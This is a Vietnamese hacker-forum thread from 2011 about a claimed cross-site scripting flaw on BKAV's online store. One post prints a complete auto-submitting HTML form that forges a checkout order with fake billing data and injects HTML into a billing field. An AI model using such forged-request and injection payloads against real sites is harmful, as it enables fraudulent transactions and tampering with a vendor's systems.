English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Cross site scripting trên trang BKAV =))  XML
  [Announcement]   Cross site scripting trên trang BKAV =)) 23/07/2011 12:20:06 (+0700) | #1 | 243959
the_transporter
Member
[Minus]    0    [Plus]
Joined: 23/07/2011 00:41:46
Messages: 1
Offline
[Profile] [PM]
Proof of Concept, ví dụ chứng minh:

http://www.russtudies.hu/php/upload/transporter6.html

Nhớ chú ý xem kỹ thanh địa chỉ ở trình duyệt.
[Up] [Print Copy]
  [Announcement]   Cross site scripting trên trang BKAV =)) 25/07/2011 06:19:51 (+0700) | #2 | 244052
[Avatar]
 .lht.
Member
[Minus]    0    [Plus]
Joined: 26/09/2010 10:06:38
Messages: 75
Location: Inside you
Offline
[Profile] [PM]
Bạn có hiểu gì về XSS ?
Trash from trash is the place for new good things ~
[Up] [Print Copy]
  [Announcement]   Cross site scripting trên trang BKAV =)) 26/07/2011 15:23:35 (+0700) | #3 | 244206
thientm
Member
[Minus]    0    [Plus]
Joined: 25/07/2011 23:31:46
Messages: 80
Offline
[Profile] [PM]
fix roi, ai chup anh lai khong a`, sorry tren dien thoai
[Up] [Print Copy]
  [Announcement]   Cross site scripting trên trang BKAV =)) 03/08/2011 19:45:31 (+0700) | #4 | 244533
nhocx
Member
[Minus]    0    [Plus]
Joined: 01/08/2011 10:15:20
Messages: 19
Offline
[Profile] [PM]
Vẫn chưa sữa mà...
Mình còn có cả đoạn code trước khi forward sang bkav store nữa ^^


------------------------------------------------------
Đa số cái gì cũng không biết trừ biết học hỏi.
[Up] [Print Copy]
  [Announcement]   Cross site scripting trên trang BKAV =)) 05/08/2011 13:24:01 (+0700) | #5 | 244596
[Avatar]
 hoanglan87
Member
[Minus]    0    [Plus]
Joined: 25/06/2008 07:20:09
Messages: 33
Offline
[Profile] [PM]
Cái này đâu phải là Cross site scripting đâu
[Up] [Print Copy]
  [Announcement]   Cross site scripting trên trang BKAV =)) 05/08/2011 23:25:43 (+0700) | #6 | 244634
nhocx
Member
[Minus]    0    [Plus]
Joined: 01/08/2011 10:15:20
Messages: 19
Offline
[Profile] [PM]
Đây là đoạn code nè, các bác thử bàn luận về nó đi. Mình thì chưa hiểu rõ chổ này lắm.
action="http://store.bkav.com.vn/checkout?p_p_id=store_checkout&p_p_lifecycle=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=1&_store_checkout_struts_action=%2Fstore%2Fcheckout"


Code:
<html>
<title>The Hurt Locker =))</title>
<body>
<form name ="solo" action="http://store.bkav.com.vn/checkout?p_p_id=store_checkout&p_p_lifecycle=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=1&_store_checkout_struts_action=%2Fstore%2Fcheckout" method="post" >
<input type="hidden" name="billing_fullname" value="Nguyễn Tử Nổ" />
<input type="hidden" name="billing_phone" value="911911911911" />
<input type="hidden" name="billing_address" value="Quốc lộ 1A, thị trấn Trảng Bomb, Huyện Trảng Bomb, Đồng Nai" />
<input type="hidden" name="business_name" value="Cơ quan năng lượng nguyên tử quốc tế IAEA" />
<input type="hidden" name="billing_requirement" value="<blink>Đặt mua Bộ film hành động - Tâm lý xã hội: Người vận chuyển 5</blink></br><img src='http://23.media.tumblr.com/kJRyUBDDFq1x2g5uoiiu6pwmo1_400.jpg' >" />
<input type="hidden" name="productId" value="24840" />
<input type="hidden" name="_store_checkout_cmd" value="checkout" />
</form>
<script language="JavaScript" type="text/javascript">
document.solo.submit();

</script>
</body>
</html>


------------------------------------------------------
Đa số cái gì cũng không biết trừ biết học hỏi.
[Up] [Print Copy]
  [Announcement]   Cross site scripting trên trang BKAV =)) 18/08/2011 15:47:51 (+0700) | #7 | 245248
cuti123
Member
[Minus]    0    [Plus]
Joined: 07/06/2011 23:59:01
Messages: 10
Offline
[Profile] [PM]
Lại có tư tưởng không tốt với BKIS rồi.
Thật đáng không nên, không nên...
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|